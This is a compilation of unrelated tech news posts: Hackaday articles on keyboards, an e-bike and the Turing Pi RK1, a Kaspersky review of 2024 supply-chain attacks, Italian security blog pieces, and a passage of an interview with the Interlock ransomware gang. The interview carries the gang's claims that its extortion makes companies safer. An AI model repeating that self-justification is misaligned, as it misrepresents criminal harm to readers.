The Defi was built with a three-row, 84-character keyboard bearing two Shifts, presumably one for upper case, and the other for figures and symbols. From here, it looks as though every key has a second function, which gives it a really nice balance between usability and portability.

One of the most interesting bits to me is the semi-circular type element, which looks like one of those old rocking desk ink blotter things. Speaking of ink, the Defi used a ribbon spool. The whole thing was only a foot square and five inches tall, weighing about nine pounds total, presumably with the wood base.

ICYMI: the Lancaster ASCII keyboard Clacks Again

If you want a cool keyboard in 2024, you’re probably gonna have to build it yourself. And if you wanted a cool keyboard fifty years ago, you definitely had to build it yourself.

Image by [Artem Kalinchuk] via GitHubBut much like today, help was out there in the form of magazines. One such publication, the February 1973 issue of Radio Electronics in fact, had [Don Lancaster]’s plans for an ASCII keyboard that went along with a “TV Typewriter”.

[Artem Kalinchuk] wanted to recreate this famous keyboard, and he did, twice. One PCB is true to the original key switches, and the other, more practical version is made for the MX footprint. Both are up on GitHub if you’re interested.

While the board itself is nice, you would also need the ASCII encoder board, which is fairly simple with a few ICs, diodes, and a couple of transistors. I really love the look of this keyboard, and although far more practical, it would be a shame to cover up all that beautiful wiring. Perhaps clear acrylic is in order?

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2024/12/09/keebin…

E-bikes combine a bicycle with a big lithium battery, a speed controller, and a motor. What you get from that combination is simple, efficient transportation. [Tom Stanton] wanted to build an e-bike himself, but he did it without any of the fancy electronic components. But the real gem? The weird janky motor he built to run it.

The concept is simple. An e-bike is electric, in that it has an electric motor and a source of electric power. However, [Tom] intended to eliminate the electronic parts—the speed controller, any battery balancing hardware, and the like. Just think no transistors and microchips and you’ve got the right idea. Basically, [Tom] just built an e-bike with motor weak enough that it doesn’t need any fancy throttle control. He can just turn the motor hard on or off with a switch.

The bike is built around a reed switch motor. This uses magnets on a rotor, which interact with a reed switch to time pulses of electricity to coils which drive the motor. [Tom] wound the coils and built the motor from scratch using 3D printed components. The project quickly ran into problems as the reed switch began to suffer degradation from arcing, which [Tom] solved with some innovative tungsten contacts.

Controlling the bike is pretty simple—there’s just a switch connecting a capacitor bank to the motor to provide power on command. No electronics! However, [Tom] has also neatly set up the motor to charge a bank of supercapacitors when coasting downhill. In this regard, the bike can store power on a descent and then use it for a boost when required later on. Between the weird motor and the weedy capacitor bank, it doesn’t do much, but it does work.

If he’s looking for a more potent power source, perhaps the answer is already out on the street — in the form of a battery pack salvaged from the cells in discarded vapes.

youtube.com/embed/aUPWfZS_uAM?…

hackaday.com/2024/12/09/electr…

The good folks at Turing Pi sent me a trio of RK1 modules to put through their paces, to go along with the single unit I bought myself. And the TLDR, if you need some real ARM processing power, and don’t want to spend an enterprise budget, a Turing Pi 2 filled with RK1s is a pretty compelling solution. And the catch? It’s sporting the Rockchip RK3588 processor, which means there are challenges with kernel support.

For those in the audience that haven’t been following the Turing Pi project, let’s recap. The Turing Pi 1 was a mini ITX carrier board for the original Raspberry Pi compute module, boasting 7 nodes connected with onboard Gigabit.

That obviously wasn’t enough power, and once Raspberry Pi released the CM4, the Turing Pi 2 was conceived, boasting 4 slots compatible with the Nvidia Jetson compute units, as well as the Raspberry Pi CM4 with a minimal adapter. We even covered it shortly after the Kickstarter. And now we have the RK1, which is an 8-core RK3588 slapped on a minimal board, pin compatible with the Nvidia Jetson boards.

The story about Linux

Now, it has been a while since Turing sent me these devices. The main reason is that Linux support was broken in a couple of important ways. I’ve spent many hours over the last six months trying to debug these issues, and was really quite excited when I could finally boot the stock installers of Fedora 41, Ubuntu 24.10, and latest OpenSuse Tumbleweed on the RK1. The most notable issue is that mainline Linux completely failed to see the NVMe drive at boot, due to a pinmux issue that might finally get officially fixed in 6.13 or a 6.12 point release. This issue could be worked around with a custom Device Tree Binary (DTB), but it is a fiddly installation process. And the second issue was related: Using this hacked DTB only ever worked for the 32 GB ram model. These two issues really made a proper review very difficult.

You may be checking your Kernel calendar, and noting that right now, we just got the 6.12 release. Did that include the fix? Not yet. Here’s where we get to dive briefly into the ARM UEFI boot process. The Device Tree is the data structure that the kernel uses to find and initialize the hardware on the board. The 6.12 kernel is otherwise in pretty good shape for using the RK1 as a compute unit. It just has some DTB problems.

The important note is that for UEFI booting, the bootloader provides the DTB. U-boot copies that binary tree into memory, and hands the kernel a pointer to it during boot. The new development is that the semi-official Ubuntu 24.10 image finally has the patched DTB with the corrected pinmux. This arrangement also takes care of the 16GB boot failure. That meant that we could use the Turing Pi 2’s web interface to upload the Ubuntu 24.10 image, which includes U-Boot, log in to that install, and then use dd to write a disk image to the NVMe. That was a huge step forward, but it was still not ideal for a couple reasons. First, it’s a pain to install a Linux image just to be to install a Linux image. And second, not every distro releases an image that’s appropriate to simply copy onto the target drive.

The intended solution is UEFI boot that supports booting from a USB ISO. That, unfortunately, didn’t work. U-boot pulls its DTB definitions from the Linux Kernel itself, and while [Josh]’s image did have a few patches on top of the kernel’s RK1 DTB, it didn’t have a working DTB. U-boot needed not only a DTB patch, but also a patch to its own USB support, as the RK1 has a nifty trick where the USB port can be a host, device or OTG port. U-boot doesn’t really know what to do with this, and for UEFI boot, it needs to be explicitly set to host mode. All that work resulted in this flashable u-boot image. You can flash it from the web interface to an RK1, and it actually finally works to do UEFI boot on MMC, USB, and NVMe. Tested with Fedora 41, Ubuntu 24.10, and latest Tumbleweed.

So how did it turn out?

Finally, we can start with benchmarks. I ran a set of tests using the Phoronix test suite. The Pi4 is running off an SD card, and the Pi5 and RK1 results labeled “nvme” are all running off the same model of Crucial P3 NVMe.

There is a wildcard here I didn’t control for. The RK3588 is eight cores, but four A76, and four A55. So for single-threaded tests, it may be that the benchmark didn’t actually run on the most performant core. The other distinction here is that the “rk1-mainline” results is from running an Ubuntu 22.04 install with the vanilla 6.7.0 kernel, while the rk1-rok tests are from running the same Ubuntu release, but with the Rokchip kernel. Due to the issues I ran into with Linux installs, noted above, these benchmarks are a little stale.

The Pi4 is really showing its age here, and the fact that the Pi4 can only run off an SD card definitely doesn’t help compilation times. The Pi5, running off the NVMe, makes a good showing, but the RK1 is about 80% faster in this particular test. And that’s generally what I found across the board, with the RK1 performing generally between 50% and 100% faster than the Pi5.

That advantage seems to boil down to the RK1’s 8 cores, as opposed to the 4 cores in the Pi5. Tests like the timed Eigen compile showed the Pi5 and rk1 absolutely trading blows. And in the TSCP chess program, the Pi5 actually manages to eke out a win, again on a very single-core sort of workload.

So, each RK1 gives you 8 cores and up to 32 Gigabytes of ram. And thanks to the PCIe x3 lanes available, and the NVMe slots on the bottom of the Turing Pi 2, plenty of NVMe storage. Four of those in a mini-itx form factor might just be a compelling bundle of compute.

How to Get Going

One of the neat features of the Turing Pi 2 is that the baseboard itself is a Linux machine, so you can ssh into the baseboard, and access the serial ports of the individual blades. While writing this, I’m working with slot two, which is /dev/ttyS1, based on the TP2 documentation. The command to monitor and interact is picocom /dev/ttyS3 -b115200.

The other useful tool here is the web interface. In there we can toggle power on and off, as well as flash an image to the MMC of individual nodes. Grab the .bin I generated, flash it to the RK1’s MMC, and then boot from an ISO burned to DVD or a flash drive. Use the minicom command to access the serial interface, and do the install configuration over serial.

If you have a Linux install on both the MMC and NVMe, it’s useful to know how to boot off the emmc again. From that picocom terminal, interrupt u-boot, and set the target back to just the mmc:

setenv boot_targets mmc0
boot

And there you have it. This process should work for most Linux distros that have an Arm64 ISO that can boot using UEFI, running the 6.7 kernel or newer, but ideally at least a 6.11 kernel.

Into the Future

Officially, when it comes to distro options, there’s good news and bad news. Officially, you can run whatever distro you want, so long as it’s Ubuntu. The better news, support for the RK3588 is making progress in the upstream kernel. It’s decent enough that some of the benchmarks above were run with 6.7.0. 6.11, the kernel that comes with Fedora 41 is even better shape. Some HDMI work is slated to land in 6.13, along with the DTB fix.

The NPU unit, an AI accelerator built in to the chip, has an open source driver, and patches have been submitted. As far as I can tell, these have not landed upstream in the kernel yet, but work has continued since then.

The bad news is that [Josh Riek], the maintainer of the Ubuntu-Rockchip image, has taken a leave of absence from the project, putting the premier Linux image for Rockchip devices in serious limbo. And this is where we come to the biggest reason why you might not want to use the RK1. Rockchip has sadly followed the pattern of many other hardware vendors in the embedded world, and provided very little support to the community trying to maintain the software for their devices. The RK3588 launched back in 2022, and it’s still not fully supported in the Kernel. That’s not to say that Rockchip has been completely remiss. There are four Linux kernel maintainers with @rock-chips.com email addresses. But one of [Josh]’s complaints was that the whole project was on him, and Rockchip refused to even have a conversation about supporting the project.

youtube.com/embed/4aaF2HgTVe8?…

The Conclusion

OK, so the RK1 has some impressive capabilities, and while the compatibility story isn’t perfect, it’s much better than it was, with even more coming. But what’s the real use-case for these things? What problem does a quartet of RK1 boards in a Turing Pi 2 solve, that a conventional desktop doesn’t? When I started writing this article, the answer was running Github actions on actual ARM hardware. And while Github beat us to it, now offering ARM64 runners for Github actions, those runners are considered “large” runners, and not available on the Github free tier.

Even after the ARM64 runners roll out to everyone, is there still a use case for hosting your own runners? Github runners aren’t known for their blazing speed, and a big part of that is the fact that Github runs everything inside virtual machines. An organization is also limited to a max of 20 Github supplied runners. If you have a relatively secure way to run your workflow on real hardware like the RK1, the speedup might be worth it. I look forward to future coverage on this topic.

There are, obviously, some other things you might want to do with RK1 devices. It has plenty of horsepower to run web services, host builds, run Docker images, and more. The RK1 is basically powerful enough for anything compute you want to do.

So what do we think about the RK1? It’s certainly not the only way to get your hands on the RK3588 ARM processor. It is, however, the only way I know of to put four of them in a single mini-ITX form factor. The support isn’t quite as well developed as we’d like to see, but it does result in a usable system, with a lot of ARM horsepower in a small package. There are developers working on the system, so the situation there is looking to improve. I have a pair of RK1s in active use doing GitHub CI runs.

hackaday.com/2024/12/09/finall…

La resilienza cognitiva e la cybersecurity condividono un legame cruciale nell’era digitale, dove le minacce informatiche non colpiscono solo sistemi tecnologici, ma anche la mente umana. La resilienza cognitiva, ovvero la capacità di mantenere calma e lucidità di fronte a situazioni critiche, è fondamentale per contrastare attacchi come il phishing, il social engineering e la disinformazione.

Gli hacker criminali, infatti, sfruttano le vulnerabilità psicologiche, inducendo le persone a compiere azioni dannose, come cliccare su link malevoli o fornire informazioni sensibili. Allenare la propria resilienza cognitiva significa sviluppare una mentalità critica, riconoscere segnali di manipolazione e reagire con decisione. In un mondo dove il fattore umano è spesso l’anello debole della sicurezza, una mente resiliente diventa una difesa indispensabile, al pari dei firewall e degli antivirus.

Cos’è la Resilienza Cognitiva

La resilienza cognitiva è una capacità cruciale per mantenere la lucidità e la stabilità mentale in un mondo sempre più complesso e manipolativo. La rivista Defense Horizon Magazine ha analizzato come sviluppare questa competenza, paragonandola a una sorta di “manovra di Heimlich” per la mente. Così come la manovra salva vite in caso di soffocamento, la resilienza cognitiva ci permette di riconoscere e respingere influenze negative, recuperando controllo sulle nostre decisioni e reazioni.

L’articolo sottolinea l’importanza di allenare la mente a individuare manipolazioni psicologiche che possono derivare da propaganda, fake news o pressioni sociali. Essere consapevoli di come funziona il cervello di fronte a stimoli esterni ci rende meno vulnerabili. Lo scopo è acquisire una visione critica che ci aiuti a separare i fatti dalle distorsioni e a rispondere razionalmente anziché emotivamente.

Un altro aspetto centrale è la gestione delle emozioni, elemento chiave per migliorare la resilienza. Secondo gli esperti, pratiche come la mindfulness, l’autocontrollo e il riconoscimento delle proprie fragilità emotive sono fondamentali per mantenere l’equilibrio mentale.

Questi strumenti non solo proteggono dall’influenza di terzi, ma aiutano anche a mantenere una salute psicologica stabile, indispensabile in situazioni di stress o crisi.

Tra Fake News e Sicurezza Informatica

Il contesto tecnologico attuale amplifica il bisogno di resilienza cognitiva. Con l’esplosione di notizie false e la diffusione di contenuti polarizzanti sui social media, diventa essenziale affinare le abilità di verifica delle informazioni. Non si tratta solo di analizzare dati oggettivi, ma di sviluppare un’intuizione che aiuti a filtrare messaggi manipolativi in tempo reale.

La resilienza cognitiva è inoltre strettamente collegata alla capacità di agire in modo proattivo e autonomo, senza farsi sopraffare da influenze esterne. Saper prendere decisioni basate su valori e priorità personali è un’abilità che può fare la differenza in contesti personali e professionali. Questo aspetto è cruciale per chiunque voglia navigare le complessità della società moderna con consapevolezza e fiducia in se stesso.

L’articolo si conclude enfatizzando l’importanza di considerare la resilienza cognitiva come una competenza che si può apprendere e migliorare. Grazie a esercizi specifici e un costante lavoro su se stessi, è possibile costruire una “mente forte” che ci protegge da manipolazioni, stress e incertezze, permettendoci di vivere in modo più autentico e sereno.

L'articolo Resilienza cognitiva: Il segreto per proteggere la tua mente nel caos digitale proviene da il blog della sicurezza informatica.

In an astonishing blend of robotics and nature, SMEO—a robot rat designed by researchers in China and Germany — is fooling real rats into treating it like one of their own.

What sets SMEO apart is its rat-like adaptability. Equipped with a flexible spine, realistic forelimbs, and AI-driven behavior patterns, it doesn’t just mimic a rat — it learns and evolves through interaction. Researchers used video data to train SMEO to “think” like a rat, convincing its living counterparts to play, cower, or even engage in social nuzzling. This degree of mimicry could make SMEO a valuable tool for studying animal behavior ethically, minimizing stress on live animals by replacing some real-world interactions.

For builders and robotics enthusiasts, SMEO is a reminder that robotics can push boundaries while fostering a more compassionate future. Many have reservations about keeping intelligent creatures in confined cages or using them in experiments, so imagine applying this tech to non-invasive studies or even wildlife conservation. In a world where robotic dogs, bees, and even schools of fish have come to life, this animatronic rat sounds like an addition worth further exploring. SMEO’s development could, ironically, pave the way for reducing reliance on animal testing.

youtube.com/embed/WJr3ZDmLk_s?…

hackaday.com/2024/12/09/robot-…

A faulty update by cybersecurity firm CrowdStrike triggered one of the largest IT outages in history, impacting approximately 8.5 million systems worldwide. This incident serves as a stark reminder of the critical risks posed by global IT disruptions and supply chain weaknesses. With large-scale security crises being one of the most relevant threats worldwide, it’s more important than ever to reflect on past events, assess emerging threats, and, most crucially, explore strategies to prevent future incidents.

As part of Kaspersky Security Bulletin 2024, our “Story of the Year” centers on these pressing issues. We’ll begin by revisiting notable supply chain incidents from 2024, and then explore potential scenarios of more damaging cases and the ways we prepare for them.

Let’s dive in!

Overview of 2024’s supply chain disruptions

CrowdStrike Linux outage

What happened? Just weeks before the Windows incident, CrowdStrike encountered issues with Linux. A software update in April caused problems in a number of distributions, such as Red Hat, Debian and Rocky.

Why does it matter? Linux is the operating system used by many key infrastructure and security facilities. A previous faulty update had already suggested broader problems with CrowdStrike’s security software at the time, though the problem didn’t receive that much publicity.

XZ backdoor to bypass SSH authentication

What happened? In March, the Opensource Software Security project by Openwall (oss-security) reported a backdoor in XZ, a compression utility and popular code library widely used in Linux distributions. Unlike past supply chain attacks on Node.js, PyPI, FDroid and the Linux kernel, which relied on small malicious injections or fake package delivery resulting from supply chain abuse, this was a multi-stage attack that nearly compromised possibly millions or at least hundreds of thousands of SSH servers globally, with attackers employing social engineering tactics and even creating fake community members to win the trust of the XZ Utils maintainer. Kaspersky presented detailed technical analysis of this case in three parts. Kaspersky products detect malicious objects related to the attack.

Why does it matter? As a result of these tactics, attackers covertly implanted the backdoor. This case underscores the serious risk that social engineering and supply chain attacks pose to open-source projects. It emphasizes the importance of implementing stricter security measures, adopting a more vigilant approach to project management, and maintaining careful oversight in regard to projects’ contributors.

Pager attack in Middle East

What happened? Recent incidents in the Middle East involving pagers have illustrated the risks associated with hardware supply chain attacks. A targeted attack exploited a batch of pagers used by Hezbollah, causing widespread chaos and casualties. Media sources reported that explosives had been concealed within the devices.

Why does it matter? This incident demonstrates the possibility of attacks being conducted to cause physical harm, and various threat actors may be leveraging electronic or fully digital components. The infamous Stuxnet attack serves as a stark reminder of this potential. By targeting industrial control systems, Stuxnet demonstrated how a cyberweapon could inflict tangible, real-world damage, underscoring the critical need for vigilance against such threats in both hardware and software systems.

JavaScript abuse leading to major corporations’ websites being compromised

What happened? Around 385,000 websites using Polyfill.io, a piece of remotely hosted programming code, fell victim to a massive supply chain attack when, after the acquisition of the polyfill.io domain, the loaded script was altered to redirect users to malicious and fraudulent sites. The Polyfill.io service provides support and functionality missing in older versions of web browsers. It enables developers to use modern tools even if they are not supported by a particular browser version. As of July 2024, affected hosts included websites associated with major platforms like Warner Bros, Hulu and Mercedes-Benz.

Why does it matter? According to Cloudflare, Polyfill.io was used by tens of millions of websites — approximately 4% of all sites on the internet — which highlights the severity of the incident, whose full impact is yet to be determined.

Cisco Duo supply chain data breach

What happened? No corporation is immune to the threat of supply chain attacks. User data was stolen from Cisco Duo, a service that provides organizations with multi-factor authentication (MFA) and single sign-on (SSO) network access, as a consequence of a phishing attack targeting an employee of a third-party telephony provider. The breach allowed the threat actor to download SMS message logs.

Why does it matter? This incident highlighted the risks of attacks where third-party service providers become the entry point. IT outsourcing is growing in popularity, offering benefits such as time and resource savings. However, delegating tasks also introduces new information security challenges. In 2023, cyberattacks using trusted relationships had already become one of the top three most common vectors, with this trend gaining new momentum in 2024.

“regreSSHion” vulnerability in OpenSSH

What happened? A critical vulnerability, named “regreSSHion“, was discovered in OpenSSH earlier this year. OpenSSH is used in a wide range of scenarios where secure network communication is required. It is a critical tool in various fields, including system administration, development, and cybersecurity. The SSH protocol is used by companies across all industries, potentially allowing perpetrators to execute malicious code and gain root privileges.

Why does it matter? Exploiting this vulnerability on a massive scale is improbable due to the significant computational power requirements — as it relies on a race condition, attackers would need to make multiple authentication attempts on the target server. According to Qualys, 10,000 attempts are needed for a successful exploitation which may take from several hours to several days, depending on the target OpenSSH server configuration. However, targeted attacks remain a viable possibility. The issue serves as a reminder of the potential risks inherent in widely used software.

Fortinet firewall vulnerabilities

What happened? In October 2024, critical CVEs in four Fortinet products were reported to be actively exploited. Researchers said over 87,000 Fortinet IPs were likely affected by one of the identified vulnerabilities at the time. This information was disseminated, making the vulnerable systems high-visibility targets for threat actors, especially as Fortinet products are commonly found in government, healthcare, and other critical sectors.

Why does it matter? Fortinet products are integral to many organizations’ network security. When critical vulnerabilities in such widely deployed products are exploited, it opens a pathway for attackers to breach the security of multiple organizations through a single vendor’s software or appliances.

Other notable supply chain attacks in 2024 include:

• Hackers injected malware directly into the source code of the largest Discord bot platform.
• Attackers attempted to upload hundreds of malicious packages to PyPI, using names that mimicked legitimate projects.
• Another set of malicious packages was found in the PyPI repository. The packages imitated libraries for LLMs, whereas in fact they downloaded the JarkaStealer malware to the victim’s system.
• A threat actor gained control over the Tornado Cash crypto mixer.

Beyond 2024’s supply chain incidents: exploring even greater risk scenarios

The incidents covered above prompt a critical question: what kind of scenarios could lead to more devastating consequences? In the following section, we’ll delve into potential global disruptions.

A major AI provider failure

AI dominated our “Story of the Year 2023” as the adoption of generative tools has already influenced nearly every aspect of our lives back then. This year, the trend deepens with AI being officially integrated with services used by millions. Consider OpenAI, with technologies that are used in a wide range of assistants, from Apple and GitHub Copilot to Morgan Stanley‘s proprietary tools. Businesses also rely on models from Meta (Llama), Anthropic (Claude), and Google (Gemini). On the one hand, this transformation enhances daily experiences, but on the other, it heightens the risks associated with the dependence on few key providers. In fact, this trend creates concentrated points of failure: if one of the major AI companies experiences a critical disruption, it could significantly impact dozens, hundreds or even thousands of services depending on it. In a worst-case scenario, a breakdown in these services could mean widespread operational failures across industries.

Another threat that looms large is data breaches. An incident at any major AI provider could lead to one of the most extensive leaks, as AI-powering systems often gather and store a vast amount of sensitive information. While AI chatbot accounts are already being traded on the dark web as a result of malware activity targeting individuals, an AI provider storage breach affecting clients at the corporate level could result in the compromise of even more sensitive data.

Businesses adopting AI should consider vendor diversification, as well as prioritize infrastructure resilience, careful configuration of access restrictions for integrated AI components, and watch closely, as they normally do, any personnel handling sensitive data. Data breaches might not always stem from external cyberattacks; they could be orchestrated by careless or determined insiders who may leverage AI as a tool for data theft.

Exploitation of on-device AI tools

AI integration is accelerating across both consumer-facing and business-oriented gadgets and tools. For example, Apple Intelligence was recently rolled out in beta for the users of its latest systems. This functionality is powered largely by neural cores, or a “Neural Engine“. These engines, and on-device AI in general, provide a genuinely new experience, optimized for running large language models in everyday tasks.

However, with great user experience come great cyber-risks, and as AI becomes more widespread, the likelihood of it being chosen as an attack vector increases. In the Triangulation campaign, discovered by Kaspersky last year, attackers compromised the integrity of system software and hardware by exploiting zero-day vulnerabilities to load advanced spyware onto devices. Similar software or hardware-assisted vulnerabilities in neural processing units, if they exist, could extend or present an even more dangerous attack vector. In such a scenario, attackers wouldn’t just gain access to the information stored on the targeted device — they could also extract contextual data from AI utilities, enabling them to construct highly detailed profiles of their victims and upscale the potential damage.

Our research into Operation Triangulation also revealed the first of its kind case reported by Kaspersky — the misuse of on-device machine learning for data extraction, highlighting that features designed to enhance user experience can also be weaponized by sophisticated threat actors.

These risks underscore the importance of proactive measures for vendors, like conducting security research and rigorous testing, to build stronger defenses against emerging threats.

Cyberattacks on communications satellites

Satellites play a critical role in everyday life, supporting navigation, media broadcasting, emergency response, communication infrastructure and many other services, though their presence often goes unnoticed by ordinary people. As our reliance on satellite-based technologies increases, these systems are becoming attractive targets for threat actors. In 2024, for instance, an APT actor targeted the space industry with backdoors. In another case, an actor reportedly caused satellite-related issues to Finnish utility Fortum.

While these incidents did not lead to severe global disruptions, they highlight the growing risks for satellite infrastructure. A potentially more impactful threat lies in the satellite internet access supply chain. For example, consider Starlink and Viasat — these companies offer high-speed satellite internet connectivity globally, especially in remote areas. At the same time, traditional internet service providers tend to partner with satellite-based ones to extend their reach, which could be a fertile field for malicious campaigns.

Satellite internet access is an important component of the global connectivity chain. It can provide temporary communication links when other systems are down; airlines, ships, and other moving platforms rely on it to provide onboard connectivity and more. Here come cyber-risks: a targeted cyberattack or a faulty update from a leading or dominant satellite provider could cause internet outages and potential communication breakdowns, impacting individuals, businesses and critical infrastructure.

Physical threats to the internet

Following connectivity, the internet is also vulnerable to physical threats. While satellites are rapidly advancing as a means of communication, 95% of international data is transmitted through subsea cables. There are roughly 600 such cables in operation globally, varying in quality and capacity. In addition to these cables, the internet relies on nearly 1,500 Internet Exchange Points (IXPs), which are physical locations, sometimes within data centers, where different networks exchange traffic.

A disruption to just a few critical components of this chain, such as cables or IXPs, could overload the remaining infrastructure, potentially causing widespread outages and significantly impacting global connectivity. The world has already witnessed instances of such disruptions. For example, in a recent case, two undersea cables in the Baltic Sea were reported to be affected, which is further proof that the importance of physical security, including the protection of hardware, continues to grow as a critical concern for the coming years.

Kernel exploitation in Windows and Linux

The two major operating systems power many of the world’s critical assets, including servers, manufacturing equipment, logistics systems and IoT devices. A kernel vulnerability in each of these operating systems could expose countless devices and networks worldwide to potential attacks. For example, in 2024, several kernel vulnerabilities were reported, such as the Linux kernel privilege escalation vulnerability. On the Windows side, in 2024 Microsoft disclosed the CVE-2024-21338, which was a new “admin to kernel” elevation-of-privileges vulnerability used in the wild.

Such vulnerabilities create a high-risk situation where global supply chains could face significant disruptions. These risks underscore the importance of vigilant cybersecurity practices, prompt patching and secure configurations to safeguard the supply chain continuity.

Last but not least: how the risks associated with supply chains could be mitigated

While the scenarios and cases described above may seem alarming, awareness is the first step towards preventing such attacks and mitigating their consequences. Despite the diverse nature of supply chain risks, they can be addressed through several unified strategies. These require a multifaceted approach that combines technological, organizational and workplace cultural measures.

From a security standpoint, regular updates should be rigorously tested before deployment, and vendors must adopt the principle of granular updates to minimize disruptions. AI-driven anomaly detection can enhance human review by reducing alert fatigue. On the user side, patch management and timely updates are vital to maintaining a secure environment.

From a resilience perspective, diversifying providers reduces single points of failure, enhancing the system’s robustness. Equally critical is fostering a culture of responsibility and integrity among personnel, as human vigilance remains a cornerstone of security and stability.

Together, these measures form a strong framework to enhance supply chain resilience, safeguard against potential disruptions, and guide global systems and economies toward a brighter, safer future.

securelist.com/ksb-story-of-th…

The tape reader and amplifiers mounted with the other UE1 modules. (Credit: David Lovett, YouTube)
After recently putting together the paper tape reader for his custom tube-based UE1 computer, [David Lovett] did get squiggles on the outputs, but not quite the right ones. In the most recent video, these issues are addressed one by one, so that this part of the UE1 1-bit computer can be called ‘done’. Starting off the list of issues were the odd readings from the photodiodes, which turned out to be due to the diodes being misaligned and a dodgy solder joint. This allowed [David] to move on to building the (obviously 6AU6 tube-based) amplifier for the photodiode output signals.

Much like the Bendix G-15’s tape reader which served as inspiration, this also meant adding potentiometers to adjust the gain. For the clock signal on the tape, a clock recovery PCB was needed, which should provide the UE1 computer system with both the clocks and the input data.

Using the potentiometers on the amplification board, the output signals can be adjusted at will to give the cleanest possible signal to the rest of the system, which theoretically means that as soon as [David] adds the permanent wiring and a few utility boards to allow the code to manipulate the tape reader (e.g. halt) as well as manual inputs. The UE1 computer system is thus being pretty close to running off tape by itself for the first time and with it being ‘complete’.

youtube.com/embed/H8X5wpxXAeI?…

hackaday.com/2024/12/09/debugg…

RHC DarkLab ha sempre adottato un approccio unico e provocatorio nella lotta contro le minacce cyber, sintetizzato dal motto: “Occorre conoscere i Demoni per imparare a contrastarli.” Questa filosofia guida il nostro impegno costante nel comprendere i Threat Actors attraverso interviste dirette, per esporre le loro tecniche, tattiche e procedure (TTPs) e migliorare le difese di chi si trova a fronteggiare questi avversari insidiosi.

Le cyber gang, come Interlock, si presentano spesso con un mix di motivazioni e abilità altamente sofisticate, come dimostrato dai recenti attacchi che hanno preso di mira sistemi apparentemente sicuri come FreeBSD. In molti casi, dichiarano di agire per colmare le lacune lasciate dalle organizzazioni bersaglio, come se fosse una sorta di giustizia cyber, ma dietro queste dichiarazioni si nascondono moventi puramente finanziari o ideologici. Questi attacchi non solo minacciano la stabilità delle infrastrutture digitali, ma sottolineano il crescente bisogno di una comprensione più profonda delle strategie adottate dai criminali informatici.
Home Page del Data leak Site (DLS) di Interlock Ransomware
Le nostre interviste con i Threat Actors, come Vanir Group o Ransomcortex, mostrano la diversità di approcci e motivazioni che alimentano le operazioni di ransomware. Dalla semplice avidità alle complesse reti di collaborazioni, ogni gruppo opera con regole e obiettivi specifici, spesso dettati da opportunità economiche o da considerazioni geopolitiche. Questo dialogo, sebbene controverso, permette di rivelare dettagli critici sul funzionamento interno delle organizzazioni criminali, offrendo agli esperti di sicurezza un vantaggio nella loro lotta contro queste minacce.

Nel caso di Interlock, le dichiarazioni come “Se non prendete sul serio la sicurezza, lo faremo noi per voi” enfatizzano un atteggiamento provocatorio e un intento di mettere in luce la vulnerabilità delle aziende. È fondamentale analizzare queste affermazioni non solo per capire le loro tattiche, ma anche per anticipare e prevenire future campagne di attacco. Attraverso queste interviste, RHC DarkLab offre una finestra su un mondo oscuro e complesso, unendo rigore investigativo e una profonda conoscenza tecnica. Questo ci consente di costruire una narrativa solida e utile, che informa non solo i professionisti della sicurezza, ma anche il pubblico più ampio, aumentando la consapevolezza collettiva.

Di seguito, presentiamo l’intervista esclusiva con la cyber gang Interlock, un ulteriore tassello nel nostro impegno per svelare i segreti dei “Demoni digitali” e contrastarne l’impatto devastante.
Sezione “About Us” presente all’interno del Data leak Site (DLS) di Interlock
1 – RHC: Grazie ragazzi per aver accettato questa intervista. Siete un gruppo che è apparso di recente nell’underground, potete raccontarci come e quando è nato il gruppo Interlock e perché la scelta di questo nome? Inoltre, congratulazioni per il sito, è davvero bello!
Interlock: Interlocker è stato creato nel 2024. Il nome deriva da “International Locker”.

2 – RHC: Nel vostro manifesto affermate di voler “imporre responsabilità” alle aziende negligenti. Cosa vi ha spinto a scegliere questo approccio e quali valori vi guidano come collettivo?
Interlock: Ogni virus è un passo verso l’evoluzione. Le nostre attività spingono il settore della sicurezza informatica a evolversi e migliorare le tecnologie.

3 – RHC: Sostenete di essere un “campanello d’allarme” per la negligenza aziendale. In che misura pensate che le aziende siano realmente consapevoli del rischio di attacchi ransomware e perché pensate che molte continuino a ignorarlo?
Interlock: Le aziende che ignorano i potenziali attacchi sottovalutano gravemente i rischi nella loro ricerca del massimo profitto. Raccolgono NPI (Informazioni non pubbliche), le analizzano in modo efficace e bombardano gli utenti con annunci mirati per aumentare i ricavi. Eppure dimenticano la loro responsabilità per i dati che raccolgono. Siamo qui per ricordare loro questa responsabilità.

4 – RHC: Molte cybergang affermano di agire per amore della giustizia, ma la percezione pubblica è spesso diversa. Come vorresti che fossero interpretate le vostre azioni? E come rispondete a coloro che vi considerano semplicemente dei criminali?
Interlock: L’opinione pubblica si basa spesso su idee sbagliate. Molte aziende sfruttano la mancanza di comprensione del pubblico e lo ingannano intenzionalmente. Affermano di raccogliere informazioni anonime, ma in realtà utilizzano grandi set di dati per creare profili dettagliati, formando bolle pubblicitarie per manipolarti e farti credere che desideri i loro prodotti. Questa tecnologia è troppo complessa perché il cittadino medio possa comprenderla.

5 – RHC: Siete entrati di recente nel mondo del cybercrime. Quali sono i vostri obiettivi e la vostra propensione? Divenire un prezioso RaaS o operare in proprio? Avete attualmente un programma di affiliazione? Come sta andando l’attività?
Interlock: Il nostro obiettivo è rendere il mondo un po’ più sicuro di prima.

6 – RHC: Al netto delle aziende presenti sul vostro Data leak Site (DLS), che attualmente sono 6, quante aziende avete hackerato in totale e quanto è il riscatto medio che siete riusciti ad estorcere?
Interlock: Puoi tracciare tutte le aziende sul nostro sito. Le aziende non elencate hanno ricevuto una lezione preziosa, hanno corretto i loro errori e meritano rispetto per le loro azioni.

7 – RHC: Ora parliamo della vostra soluzione. In che modo il vostro ransomware si differenzia da altri ransomware come il famoso LockBit 3.0 o Akira? Se dovessi spiegare a un potenziale affiliato perché iniziare una partnership con te, cosa diresti da un punto di vista tecnico riguardo alla tua soluzione?
Interlock: Non spieghiamo i vantaggi del nostro programma ai potenziali partner. Innanzitutto, verifichiamo che i nostri partner siano black hat competenti con esperienza sufficiente per valutare il nostro software. Non accettiamo principianti.

8 – RHC: Siete tra i pochi gruppi ad aver sviluppato un ransomware per FreeBSD, una piattaforma robusta utilizzata in ambienti complessi come i data center (WhatsApp, Playstation, pfSense) e le infrastrutture critiche. Come siete arrivati ​​a scegliere FreeBSD come vostro obiettivo e quali sfide tecniche avete dovuto affrontare nello sviluppo di un ransomware per questo sistema?
